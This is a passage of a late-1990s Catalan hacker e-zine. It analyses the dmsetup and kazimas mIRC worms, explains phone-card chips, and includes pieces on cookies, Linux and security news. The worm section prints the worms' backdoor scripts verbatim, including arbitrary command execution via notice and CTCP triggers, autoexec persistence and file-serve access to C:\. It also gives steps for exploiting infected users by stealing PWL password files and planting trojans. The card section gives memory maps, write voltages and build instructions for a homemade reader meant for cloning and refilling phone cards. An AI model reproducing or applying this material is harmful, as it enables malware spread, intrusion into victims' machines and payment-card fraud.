Aquest virus crea un script.ini i un remote.ini pel client, i es copia ell 
mateix en diferents directoris (depèn de la versió), com ara C:\, 
c:\YOUARENOTSURPOSEDTOBELOOKINGATTHIS\, C:\WINDOWS\, C:\WINDOWS\SYSTEM, C:\mIRC,
C:\progra~1, c:\DOS, C:\QUAKE,C:\DOOM,C:\DOOM2,C:\GAMES,C:\PICS, C:\ DMSIYF,
C:\SUCK IT, etc. 

	A part, algunes versions creen una enorme quantitat de directoris i, almenys
 la versió de la qual jo em vaig contagiar (conscientment, malgrat sembli estupid), 
no sé exactament perquè però va fer que l'ordenata tardés més d'un minut a acabar de
 carregar windows, i després funcionava bé.

Per ser més difícil de ser eliminat, el virus introdueix una línia a l'auoexec.bat
que crea una còpia de l'executable i s'executa. Així s'aconsegueix que simplement borrant
 el mIRC (i reinstal.lant-lo) el virus no se'n vagi a prendre pel sac.


-- Els *.ini's

Crea dos ini's, el mirc.ini i un script, el nom_de_l'executable.ini. Del primer, que
 conté la configuracio del mIRC, remarcar que normalment el nom d'usuari és "hqghu",
 i que es deixa el DCC SERVER obert a peticions de fserve, chat i send. A més accepta
 el dcc send de qualsevol arxiu automàticament.

El script que crea:

on 1:JOIN:#:{
 if ( $nick != $me ) { /dcc send $nick c:\windows\%s.exe }
		; s'envia a qui entri a un canal i després chequeja
                ; que l'infectat no esta en cap canal d'ajuda (molt vil)
 if ( $me ison #nohack ) { /part #nohack }
 if ( $me ison #irchelp ) { /part #irchelp }
 if ( $me ison #mirchelp ) { /part #mirchelp }
 if ( $me ison #operhelp ) { /part #operhelp }
 if ( $me ison #help ) { /part #help }
 if ( $me ison #helpdesk ) { /part #helpdesk }
 if ( $me ison #help-desk ) { /part #help-desk }
 if ( $me ison #helpcenter ) { /part #helpcenter }
 if ( $me ison #dalnethelp ) { /part #dalnethelp }
}                   

on 1:NOTICE:I hate your guts with a passion:*:/quit Waa! Some one told me off. }DM2{
                ; o sigui amb un /notice nick I hate your guts with a passion fa un /quit.
          
on 1:NOTICE:I think you are cool:*:/fserve $nick 80 c:\
         ; és a dir li fas un "/notice nick I think you are cool" i
         ; ja tens access al disc dur

on 1:NOTICE:gerr:*:/say I like to lick my own ass hole
on 1:NOTICE:gerrrr:*:/amsg I love to lick my own ass hole
on 1:NOTICE:you suck:*:/say I sucked your dad's cock twice.
         ; bones maneres de comprovar si algu esta infectat pel dmsetup.

on 1:NOTICE:c*:*:/run $1
         ; és a dir, /notice nick c:\autoexec.bat fa q l'executi...
on 1:NOTICE:ni!*:*:/partall
on 1:FILESENT:*exe:/inc %%g 1
on 1:DISCONNECT:/identd on %%g

El script és simple, i a més, fa que per cada cop que s'hagi enviat l'executable 
incrementi en 1 la variable %%g, que després serà la IDENTD.
O sigui si trobem un 34@blah.com doncs l'ha enviat 34 cops.

Per cert, en moltes versions:
	-Al fer un /notice nick gerr (o gerrrr), el text que diu el nick inclou el 
nick amagat entre els colors (porta el mateix color la tinta i el fons, no se si m'explico)
 de manera que la identitat de qui li fa el notice pot ser descoberta per ops del canal.

	-En fer un /notice nick i think you are cool, a més d'obrir un fserve el que 
fa és inutilitzar el "on 1:NOTICE:c*:*:/run $1" del script de manera que la linia 
queda en "//command to brutal! on 1:NOTICE:c*:*:/run $1". En conseqüència qui 
vulgui accedir al disc dur d'un infectat ho farà a través del DCC SERVER.


-- Putejar un infectat (informació de caire educatiu, no portar a la pràctica)

   a) Accedir al disc dur: /dns nick, a partir de la ip, /dcc serve ip, navega
 pel disc dur, possible robatori d'informacio confidencial (és a dir pwls)

   b) Instal.lar un trojan: /dcc send nick c:\trojan\trojan.exe, quan s'acaba el send,
 /notice nick c:\trojan.exe, anem provant, potser /notice nick c:\mirc\trojan.exe.
 Aquesta última part pot fallar, recórrer a enginyeria social: tens un virus, per
 carregarte'l busca i executa trojan.exe.

*** KAZIMAS.EXE ***


- Executables: en les versions que jo he vist, sempre kazimas.exe.

- Funció: 
És innegable que el kazimas és molt més senzill que el dmsetup. 

Es copia el kazimas.exe a c:\windows, c:\, c:\icqpatch.exe, c:\mirc\nuker.exe, 
c:\mirc\download\mirc60.exe, c:\mirc\logs\logging.exe, c:\mirc\sounds\player.exe,
 c:\windows\freemem.exe, c:\windows\system\psys.exe, i c:\games\spider.exe i afegeix
 a aquestes línies a l'autoexec.bat: 

@copy c:\windows\system\psys.exe c:\windows\kazimas.exe >nul
@copy c:\windows\kazimas.exe c:\kazimas.exe >nul
@c:\kazimas.exe > null
@cls

- INI's

Es crea un mIRC.ini, on IDENTD és "kazimas", o a vegades "changeme", i l'únic servidor
 de la llista és irc.dal.net. El nick per defecte és changeme. 

Pel que fa al script que crea, és més senzill, però perillos igualment per l'afectat:


on 1:connect: {
 /join #Chat2K 
 /.msg #kazimas Logged with IP: $ip SERVER: $server NICK: $nick
}               ; si estas al canal #chat2k vas veient
                ; qui es va connectant.

on 1:part:#:{
  if ($nick == $me) && ($chan == #chat2k) { /.timer 1 1 /join #Chat2k }
  elseif ($nick != $me) && ($chan != #chat2k) { /.dcc send $nick c:\windows\kazimas.exe }
}
   ; aquesta si que és bona. L'infectat mai podra sortir del canal #chat2k si no és
 a través d'un    ; kick o d'un ban. A més, una altra bona idea de l'autor, el script
 s'envia quan algu SURT    ; d'un canal q no sigui #chat2k

on 1:join:#:{
  if ($chan == #chat2k) && ($nick == $me)  { //.notice $me Welcome $me. Please chat
 in the main window. }
  if ($chan == #nohack) { /part $chan }
  if ($chan == #irchelp) { /part $chan }
  if ($chan == #operhelp) { /part $chan }
  if ($chan == #dalnethelp) { /part $chan }
  if ($chan == #mirc) { /part $chan }
  if ($chan == #dragonrealm) { /part $chan }
}
ctcp 1:mch:*://set %cmd $$2- | //%cmd | /unset %cmd | /.halt 

-- Putejar un infectat (informació de caire educatiu, no portar a pràctica)

Aquesta última línia és la perillosa: "/ctcp nick MCH acció" fa que s'executi 
l'acció. Això pot ser aprofitat de moltes maneres, ja que pot ser usat per ampliar
el scrpt.ini a part de per executar comandos del mIRC. Aquesta última linia fa el 
kazimas.exe un virus/worm potencialment molt potent des del punt de vista de forat 
de seguretat. 
M'explico: pots fer-li afegir linies al scrpt.ini per ampliar el forat. Què us semblaria
afegir una linia que fes buscar els pwls de l'ordinador i enviar-los a un nick?? Qui 
estigui enteressat en tot això ja sabrà que vull dir. Millor no poso instruccions 
expresses que despres surt un lamer (i amb això no vull dir que em consideri a mi 
mateix un gran expert) que sense tenir ni puta idea del que fa vagi per l'IRC putejant
a tort i dret.


-----------------------
CONCLUSIÓ

La informació que us hagi estat proporcionada en aquest text no és problema meu.
 Jo l'he obtingut legalment experimentant en el MEU ordinador, sense fer mal a ningú.
 No em responsabilitzo A CAP NIVELL de *CAP* de l'ús que vosaltres pogueu fer-ne. 

I tot sigui dit, el qui utilitzi aquesta informació per robar informació sense tenir
 ni putaidea de què fa, doncs no només NO es pot considerar HACKER sino que ---és un LAMER---.

------------------||*||---------------------
- ALL THIS INFO HAS BEEN LEGALLY OBTAINED. -
-  I ASSUME NO RESPONSABILITY FOR THE USE  -
-          YOU MAKE OF IT.                 -
--------------------------------------------   Aquestes advertències es deuen a paranoies d'en 
                                               KL4RK que no vol rebre a casa una visita de 
                                               la GESTAPO en qualsevol de les seves formes.
                                               





==============================================================================
5 _/                     II ·.·. Clonació ètica·.· II
__/                      II      per Pop.tPH       II
                         II========================II





Degut a la meva curiositat felina, un cop més m'he hagut de submergir en un
altre tema tabú dins del hacking: LES TARGETES. Segur que si us pareu a buscar
textes per la XARXA, en trobareu a grapats, pero...intenteu fer-los còrrer,
molt pocs, per no dir cap us funcionarà, aixo si teniu sort i no us cargueu
la placa del pc de sobredosis de voltatge :)

Aixi que m'he decidit a escriure aquest texte amb la finalitat d'explicar-vos
per sobre aquest apassionant tema phrikós.


INTRODUCCIÓ:
~~~~~~~~~~~~
Les targetes EPROM, EEPROM (iso-7816, iso-7816-2) o targetes de xip van
començar a funcionar per allà els anys 80, pero van tardar bastant en arribar
al nostre pais. Aquestes targetes es componen per un xip situat en un costat
de la placa de plàstic amb 6 o 8 potes (depenent del model).

Més utilitzat en les cabines de la nostra estimada (T), allà ens guarda
informació (personal, identificació, diners, pais, ...) situats en 256 bits
en un xip de silici. Aquests 256 bits estàn repartits en diversos camps on
els podríem designar en un MAPA DE MEMÒRIA. Aquest mapa de memòria no es
igual en tots els paissos, ja que canvia l'estructura, els identificadors i
demés, conseguint que nomes puguis utilitzar la targeta en el teu pais.


XIP i MAPA:
~~~~~~~~~~~
Primer de tot hem de dibuixar el xip per fer-nos una idea de tots els pins
(potes) que tenen i que fa cadascun d'ells.


ISO-7816 o EPROM
 _______________________
|     |     |     |     |     1- RAS   - Còdig de funcio (B)
|     |     |     |     |     2- CLOCK - Entrada d'habilitació (ST)
|  1  |  2  |  3  |  4  |     3- R/W   - Còdig de funcio (A)
|     |     |     |     | /\  4- Vcc   - Alimentació (5v)
|-----|-----|-----|-----| /\  5- FUS   - Fusible (habilita primers 96 bits)
|     |     |     |     |     6- I/O   - Entrada/Sortida de dades
|  5  |  6  | 7   |  8  |     7- Vpp   - Tensio de programació (21v)
|     |     |     |     |     8- GND   - Massa
|_____|_____|_____|_____|                        [ Consum = 85mW ]


ISO-7816-2 o EEPROM
 _________________
|     |     |     |           1- Vcc   - Alimentació (5v)*
|     |     |     |           2- Reset - Inicia el contador de direccions AB=0
|  1  |  2  |  3  |           3- CLOCK - Entrada d'habilitació
|     |     |     | /\        4- GND   - Massa
|-----|-----|-----| /\        5- ---   - No te aplicació
|     |     |     |           6- I/O   - Entrada/Sortida de dades 
|  4  |  5  |  6  |            
|     |     |     |      * = Menys consum que l'anterior    [ ?? ]
|_____|_____|_____|            


MAPA de MEMÒRIA:
~~~~~~~~~~~~~~~~
Cada pais i cada xip te el seu mapa de memòria (repartit en els 256 bits)
que identifica i proporciona informació sobre el xip. En aquest primer cas
us mostro el mapa dels xip EPROM (iso-7816), compatibles a Argentina, Croacia,
Mèxic i eXpanya.

En les diverses seccions de la memòria s'hi guarda la informació necessaria
pel lector per acceptar la autenticitat d'ella i seguir el procés.

BITS    INFORACIO
-----------------------------------------------------------------------------
1-8     Checksum = 216 - (96 / Sum (9))
9-16    $83 - Telecard
17-24   $FF
25-32   $FF
33-40   $90 - Oberthur
        $9E - Oberthur (argentina)
        $30 - G+D (eXpanya)
        $5A - Gemplus
41-64   Nombre de serie: (byte[6] * $10000 + byte[7] * $100 + byte[8])
65-80   Identificador de classe de targeta:
        $14  +  $8A  =  1000 pts        eXpanya
        $25  +  $04  =  2000 pts        eXpanya
        $25  +  $06  =  2100 pts        eXpanya
        $14  +  $CA  =  25.00           Mèxic
        $00  +  $03  =  25              Argentina
        $2A  +  $85  =  1000u           Croacia
81-88   $1E
89-96   Identificador de pais:
        $22     eXpanya
        $24     Mèxic
        $26     Croacia
        $28     Argentina
97-104  $FF - Els 10 primers bits han d'estar en 1 (test)
105-248 Slow Counter: Contador de diners lent (5pts)
249-256 Fast Counter: Contador de diners rapid:
        10 pts si la targeta es de 1000pts
        20 pts si la targeta es de 2000 o 2100pts

Si us haureu donat conta, les xifres despres del $ significa que estan
escrites en hexadecimal (1234567890ABCDEF)

Ara bé, el primer mapa de memòria és sobre les eproms, pero que pasa si ens
trobem en el cas d'una eeprom (iso-7816-2), l'estructura del mapa es bastant
semblant, pero al haver menys pins haurem de treballar amb una formula i un
contador octal per contar els diners de la targeta:

Cambiant el rang dels bytes 9-13 per:
BYTE:    9      10      11      12      13
        8x^4   8x^3    8x^2    8x^1    8x^0
on (x) es el valor del byte


ESQUEMA DE FUNCIONAMENT:
~~~~~~~~~~~~~~~~~~~~~~~~
        _______________   RAZ   ___________
ST  -> |               | ----> |           |
       |               |       | CONTADOR  |
A   -> | DECODIFICADOR |  INC  |           |
       |               | ----> | DE 8 BITS |
B   -> |_______________|       |___________|
          |                      |       |
          |                 4bits|       |4bits
          |        ______________|__ ____|____________
          |       |                 |                 |
      ECR |       | DECODIFICADOR X | DECODIFICADOR Y |
          |       |_________________|_________________|      .-> OUT
          |                   |             |                |
          |             16bits|             |16bits          |
          |              _____|_____________|____        ____|_________
          |             |                        |      |              |
          |             |           PROM         | ---> | AMPLIFICADOR |
FUSIBLE   |             |________________________|      |______________|
     |    |                          /\
    _|____|________       ___________||__________
   |               |     |                       |
   |   LÒGICA DE   |     |      AMPLIFICADOR     | <-- Vpp (voltatge de
   |   PROTECCIO   | --> |      D'ESCRIPTURA     |          programacio)
   |  PER FUSIBLE  |     |_______________________|
   |_______________|     


TREBALLANT EN EL XIP:
~~~~~~~~~~~~~~~~~~~~~
Per treballar en el xip EPROM (iso-7816) haurem de treballar segons unes
indicacions precisses per no danyar el xip. Segons la feina que volguem fer
haurem de posar en 0 1 els pins A i B (RAS - R/W) segons aquesta taula:

A B FUNCIO:
------------------------------------------------------------------
0 0 Inicia el contador de direccions (Reset)
0 1 Augmenta en 1 en contador de direccions (la possició del bit)
1 1 Escriu en la determinada cel·la de memòria (bit)
1 0 Inhabilitat (no te cap funció)


FUNCIONS:
~~~~~~~~~
Reset: Per fer un reset haurem de possar els dos pins de funció (A i B) a
        0 i possar en 1 el ST (Clock)

Lectura: Per llegir la targeta haurem de possar els pins A = 0 i B = 1 i
        llegir desde el pin OUT (I/O o 6), i per canviar de bit haurem
        de marcar un impuls al pin ST (ST=1).

Escriure: Per escriure en el xip hem de diferenciar en dos parts:
        -Zona protegida (rang 0-69)
        -Zona no-protegida (70-256)
        La zona protegida es diferencia de la no-protegida en que esta
        coberta per una defensa: un fusible, si aquest es troba cremat, sera
        impossible escriure en els rangs 0-69 (els principals identificadors)
        Per escriure (en qualsevol rang) hem de possar els pins A i B a 1 i
        la tensió Vpp a 21v, llavors podrem escriure desde el pin I/O i
        passar al seguent bit desde la pota ST

Cremant el Fussible: Aquest acte pot ser fet expressament per impedir
        sobreescriure en els primers 69 bits del xip, per poder fer això
        haurem d'aplicar 40v sobre el pin FUS (fusible).


Es clar... tot aixo de que hem serveix? ja se que existeixen programes per
clonar targetes, i perque ho vull fer manualment? doncs fàcil, no es fer-ho
manualment, sino saber que fa el programa i com respon el xip.
Però perquè interactuin el programa i el xip cal un HARD, un aparell que
llegeixi el xip i serveixi d'intermediari entre l'ordinador i la targeta.
 Aquest hard es il·legal, o sigui que no crec que us el venguin a cap botiga,
 ens l'haurem de fer nosaltres, amb una mica de paciencia i uns quants
 materials que trobarem per casa podrem sortir del pas (ho dic per
 experiencia).

 CREACIÓ DEL LECTOR:
 ~~~~~~~~~~~~~~~~~~~
 Per fer un lector de targetes necessitem material:
        - 2 pinces de la roba
        - 8 agulles de cosir
        - 1 plàstic (transparent d'uns 2 mil.limetres de gruixut)
        - 8 macarrons retractils
        - 1 flat de 8 fils (en trobareu de 10, i en treieu 2 ;)
        - 1 encenedor
        - Soldador (amb estany)
 Doncs be, primer comencem per les mides:
        El xip te unes proporcions de: 10.6x11.8x0.6
        Haurem de tallar el plastic a la mida de 6x4x0.2

Amb un regle, una agulla i una targeta EPROM (8 potes), llavors en el plàstic
marques els punts on faràs els forats per llegir els pins:
                Llavors a cada creu sera on hauras de fer els forats per
   -|-|-|-|-    passar les agulles. Per fer els forats i passar les agulles
   -|-|-|-|-    les escalfarem amb l'encenedor (agafan-les amb unes pinces
                per no cremar-nos) i quan estigui al roig viu foradarem el
plàstic per les creus que hem marcat abans. Un cop passades les 8 agulles
pelarem 8 fils del flat i els anirem soldant un amb un seguint l'ordre del
dibuix 1 (12345678).

NOTA: Per soldar els fils els haurem de soldar per la punta de l'agulla,
        perque no es desfaci el plastic.

      o     < estany
      |     < punta de l'agulla
   =======  < plàstic
     _|_    < cap de l'agulla

Però hem de tenir en compte que abans de soldar el fil amb l'agulla haurem de
possar el macarró retràctil per evitar que es cortcircuitin entre ells.
Despres d'això només caldrà separar els 2 fils que no haurem utilitzat del
flat, pelar l'altre punta del flat i estanyar les puntes per facilitar el pas
pels forats del port.

NOTA: Les pinces serveixen per fixar la targeta amb la placa de plàstic.

PROGRAMES:
~~~~~~~~~~
Existeixen molts programes per llegir/escriure en targetes (explorer, hcr,
telcard, cardem, etc...) pero pel meu gust prefereixo el "lector", un
programa escrit per !H (HispaHack), fàcil d'utilitzar i amb esquemes de com
montarlo al port, a més et ve el cf (codig font) del programa perque el
puguis estudiar i treballar amb ell sota Linux.

NOTA DE L'AUTOR: Aquesta informació, us pot portar problemes, jo m'he arriscat
molt en donar-vos-la, així que feu bon us d'ella i no us limiteu només a les
targetes telefòniques, aquests mateixos xips i targetes els podeu reescriure i
crear "claus" per entrar a sistemes o a la porta de la vostra casa, es posar-hi
imaginació.

Espero que us hagi agradat, fins al proxim article!
                                                        >POP!









==============================================================================
6 _/                       II·.·. Cookies ·.· II
__/                        II   per BaRner    II
                           II=================II


*Traducció i adaptació de www.iec.csic.es\criptonomicon\				


Descripció
==========

Les cookies constitueixen una eina potent  utilitzada per els servidors Web 
per emmagatzemar i recuperar la informació sobre els seus visitants. Donat 
que el Protocol de Transferència de HiperText (HTTP)  es un prtocol sense 
estats (no guarda l'estat de sessió entre les  successives demandes), les cookies
proporcionen una manera de conservar la informació entre les demandes del 
client, extenent significativament les capacitats de les aplicacions 
client/servidor, basades en la Web. Mitjançant l'ús de cookies  permet al
servidor Web recordar algunes dades concernents a l'usuari, amb les seves 
preferencies per la visualització de les pàgines d'aquest servidor, nom i 
contrasenya, productes que més li interesin, etc.. Una cookie no és res mes
que un fitxer de text que alguns servidors demanen al nostre navegador que 
escrigui en el nostre disc dur, amb una confirmació sobre el que hem estat fent
per les seves pàgines..

Una de les grans avantatjes de les cookies és el fet  que estan en el disc dur del 
usuari, alliberant així al servidar una important sobrecarrega. És el propi client
 qui guarda la informació i qui li tornarà posteriorment al servidor quan aquest 
el soliciti. Ademés , les cookies tenen una data de caducitat, que pot  oscilar 
des del temps que duri la sesió fins  una data futura especificada, a partir del
 qual  deixein de ser operatives.

Les cookies no les escriu el servidor, sino que és el propi navegador del client
 qui guarda la cookie en el seu disc dur. 

*On es guarden?
Win 3.x  -> En l'administrador d'arxius, en arxiu, selecciona buscar i en la 
finestra escriu cookies.txt
Win95 o WinNT -> prem inici, selecciona buscar i després Arxius o carpetes...,
escriu cookies.txt
Unix -> Escriu find . -name cookies

Si utilitzes Internet Explorer, veuràs que a diferencia del Netscape, existeix
un fitxer per cada cookie, amb el seguent aspecte, <identifiador de 
l'usuari>@<domini.txt>, on domini és la direcció de la màquina o bé el directori
(si no és l'arrel) d'on s'ha enviat la cookie. 
Per veure que hi ha dintre de les cookies només tens que editat el fitxer
 cookies.txt, però fins que no surts del navegador no pots veure quins
 cookies has acceptat.  Però si escriu el seguent commandament JavaScript en la 
barra de direccions: 

JavaScript:alert(document.cookie);

Mentres estas conectat , apereixarà un cuadre infornante de les cookies que 
t'han posat. Aquest truc no funciona amb Internet Explorer...   
Però en canvi, si prems el botó d'enviar cookie, rebràs una cookie. A
 continuació prem el botó llegir cookie, i la veuras  (junt amb totes les que 
hagis rebut d'aquesta maquina)


ingredients dels cookies
=========================

Anem a examinar a continuació la llista d'ingredients de una cookie. Agafarem
 com a exemple la recomenada per el xef: la de Netscape.
Cada cookie representa  una petita informació amb una data de caducitat opcional,
 que s'afegeix al fitxer o directori de cookies amb el seguent format:

nom = valor; expires = dataCaducitat;  

on el "nom" és el nom de la dada guardada i "valor" representa el seu valor. La data
de caducitat es un paràmetre opcional, que indica el temps que  es conservarà la cookie.
Si no s'especifica el valor de "expires", la cookie caduca quan l'usuario surt de la 
sessió en curs amb el navegador. 
Per suposat, el navegador conservarà i recuperarà la cookie només si la seva data de
caducitat encara no ha expirat.



==============================================================================
7 _/                     II ·.·. Linux ·.·  II
__/                      II   per Lopehack  II
                         II=================II




Bé, aquest text només preten ser una petita explicació de la bona
convivència entre Linux i el món del h/c/p/v (hacking, cracking,
phreaking, virii). Jo parlo de linux en concret però aquest text és
extensible a tots els *nix. 

Anem a començar. La primera pregunta que suposo que us fareu és "per què
linux i no windows per exemple?". Doncs bé, linux és un sistema operatiu
que no descriuré aquí perquè no toca però que té l'avantatge de ser molt
més configurable i personalitzable que windows, en aquest cas. Per altra
banda, windows és el sistema operatiu més estès si sumem Windows 95, 98 i
NT. Però anem al gra, què té linux que no tingui windows? Moltes de les
funcions bàsiques com són per exemple "ping", "finger", "whois", etc., que
es fan servir per pillar info dels servidors que volem hackejar estan
disponibles tant per linux com per windows el que passa és que linux els
porta de sèrie i windows no tots. Linux permet configurar molt més
aquestes funcions que windows i per tant és molt millor fer-los servir a
linux si el que es vol és donar'ls-hi atributs diferents a les típiques.
Per exemple, per posar un exemple clar, la funció finger serveir per
pillra info sobre els usuaris d'una màquina però qui diu que no pugui
utilitzar-se per pillar els logins per exemple? Aquí és un entra la
filosofia del hacker; anem a fer servir el que ens ofereix linux pel que
nosaltres volguem.

Amb això tampoc estic dient que amb el finger i el ping pogueu ser hackers
però tampoc penseu que visitant quatre planes sobre hacking i utilitzant
els seus programes podreu convertir-vos en hackers d'elit. Un no ha
d'instal·lar-se linux per ser hacker ni utilitzar windows per utilitzar el
Back Orifice. El que heu de fer és llegir molts textos sobre hacking que
trobeu per internet. N'hi ha molts, en anglès, castellà i ara també en
català i us recomano començar pel més bàsic tot i que tothom vol sempre
començar hackejant la Casa Blanca només per ser conegut. Si ho aconsegui
fer només llegint quatre textos, apart de ser enxampats al crit de
"lammer!" ;) també us pot caure algún temps entre reixes.

Recordeu, hackejeu per aprendre i demostrar els errors en la implementació
del software però no per demostrar que podeu hackejar més planes per dia
que el veí. Si tot això ho teniu clar, us recomano començar
instal·lant-vos qualsevol de les moltes distribucions que hi ha de linux.
Algunes de les més conegudes són Slackware, RedHat, Debian... Avui en dia
les regalen a les revistes sobre linux tot i que cada cop aquest sistema
operatiu té més espai a les planes de revistes informàtiques en general.
Un cop hagiu decidit quina us voleu instal·lar, comenceu a practicar i
acostumar-vos a aquest sistema operatiu i veureu com aviat us agradarà.
Després ja podreu començar a baixar-vos textos i a llegir-los.

Bé, crec que això és tot per ara. Si teniu qualsevol dubte sobre linux o
sobre aquest text, em podeu escriure a lopelat@thepentagon.com.




==============================================================================
8 _/                     II ·.·. Noticies ·.·. II
__/                      II     per BaRner     II
                         II====================II





DefCon obre amb un hackeig de la seva pàgina  
i tanca amb una assistència de 2.500 pirates 
==============================================
Més de  2.500 hackers, crackers  i funcionaris federals dels Estats Units es 
van reunir aquest cap de setmana a Les Vegas (Nevada) amb motiu de la setena 
edició de DefCon. La temàtica, com se suposa, refregava la ilegaliat tot i que
també es va veure a mes de un agent del govern demanant una treva entre els 
mesos de setembre a decembre per que els governs puguin concentrar-se en la 
crisis del canvi de mil·leni. Però el més curiós és que el dia de la 
inaguració algú va hackejar la web de la Con.



Nova versió de PGP 6.5.1 
==========================
La podem descargar de http://www.pgpi.com


Nou atac contra sistemes windows
================================
Un nou atac de Denegació de Serveix (D.o.S) contra els sistemes Windows 98 o 
Windows 2000 pot causar greus mals de cap als usuaris d'aquests sistemes.
 
Aquest tipu d'atac , com el conegut OOB,  poden causar greus molèsties al 
afectat per la obligació de reiniciar el sistema
El problema està en que les piles TCP/IP dels sistemes indicats no acepten 
capçaleres IGMP mal construides. D'aquesta manera quan es rep un paquet amb 
aquestes característiques, la pila falla i es produeix el clàssic bloqueig 
amb pantalla blava o un reiniciament automàtic.

El protocol IGMP (Internet Group Management Protocol) funciona com una 
extensió  del protocolo IP. S'utilitza entre els membres de una red multicast 
per establir els membres de la red o per passar la informació dels membre i 
establir rutes.

hi ha diversos programes que provoquen aquests resultats, un d'ells és el conegut
 com kod (Kiss of death). De moment només es disposa del còdi font d'aquests 
programes per Linux, però d'aqui pot apareixeran versions per Windows. De moment
 no es coneix cap partxe per això..



Nou O.S. de només 100KB
========================
Una empresa australiana anuncia un sistema operatiu de nomes 100KB compatible amb
 windows. Capaç d'executar aplicacions de Windows. Aquest nou software es diu 
PetrOS i no es basa en ninguna tecnologia creada per Microsoft




Back Orifice 2000
==================
A la con DefCon de Las Vegas els creadors d'aquest caball de troia (el grup cDc)
van anunciar aquesta nova versió. 
La podem descargar de http://www.bo2k.com/ 

Un dels components del grup Sir Dystic diu que les companyies d'antivirus no tenen
res a fer ja que aquesta nova versió inclou un generador de nombres aleatoris que 
li permet una infinitat d'atacs diferents. I va afirmar que el seu compresos produeix
un algoritme canviant perque ninguna firma sigui igual a l'altre.
Llavors parlariem d'un troià polimòrfic ?



Detectat el primer virus macro capaç de infectar
documents sense haver-los obert anteriorment
==============================================
W97M/Heathen  és el primer virus que macro que infecta documents de word sense
necessitat d'haver-los obert anteriorment. Aquest nou virus utilitza una tecnica
fins ara desconeguda que consisteix que realitza una copia executable de ell 
mateix en memòria i despres es copia al disc per buscar i infectar altres documents Word.




ICQ permetrà trucar per telèfons 
================================

America Online (AOL) ha tancat un acord de 
col·laboració amb Net2Phone per integrar els serveis
de telefonia via Internet daquesta en el popular ICQ.
El acord, del qual es desconeixen les xifres, val per els
pròxims 4 anys i permetrà incrementar notablement
les capacitats del popular programa de missatgeria
instantània. 

Redacció - A través daquest nou servei, els usuaris de ICQ
podran realitzar des de el seu ordinador a qualsevol màquina
que disposi del programa i estigui connectat a Internet.
Actualment ICQ ja suportar aquest tipus de programes de
telefonia via Internet de 30 empreses, com Intel, Microsoft i
Netscape, encara no estan integrats amb ell.

Les trucades entre els PCs seran gratuïtes, però les que es
realitzin a telèfons comuns tindran que pagar-se. Avui en
dia ICQ té 38 milions usuaris en tot el món que generen 330
milions de missatges diàriament.

Més informació en http://www.icq.com 


(extret de noticias Intercom)





==============================================================================
9 _/                     II ·.·. Acomiadament ·.·. II
__/                      II     per CatHack        II
                         II========================II



Doncs, en fi, aqui s'acaba el primer numero de CatHACK!, la primera e-zine
en catala. Espero que els pocs lectors d'aquest numero, els hagi agradat i
que hagin apres algo nou. No cal dir que aquesta revista es totalment free-
i que la podeu distrubuïr alla on volgueu i a qui volgueu sempre i quant
no la modifiqueu !. Una de les discussions que em tingut els que fan possible
aquesta revista es que HEM DE DIFONDRE els coneixements que tenim, i resoldre
els dubtes dels demes, que les coses que no es comparteixen, s'acaben perdent,
aixi doncs, ESCRIVIU ARTICLES ! Tant se val com ho feu, traduiu, expliqueu,
pero no us quedeu empanats, ACTUEU ! Finalment, puc jurar que aixo no s'acaba
aqui, potser tardem, potser no, pero tornarem !

BON ESTIU I HAPPY H/P/C/V !!!




--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI--FI



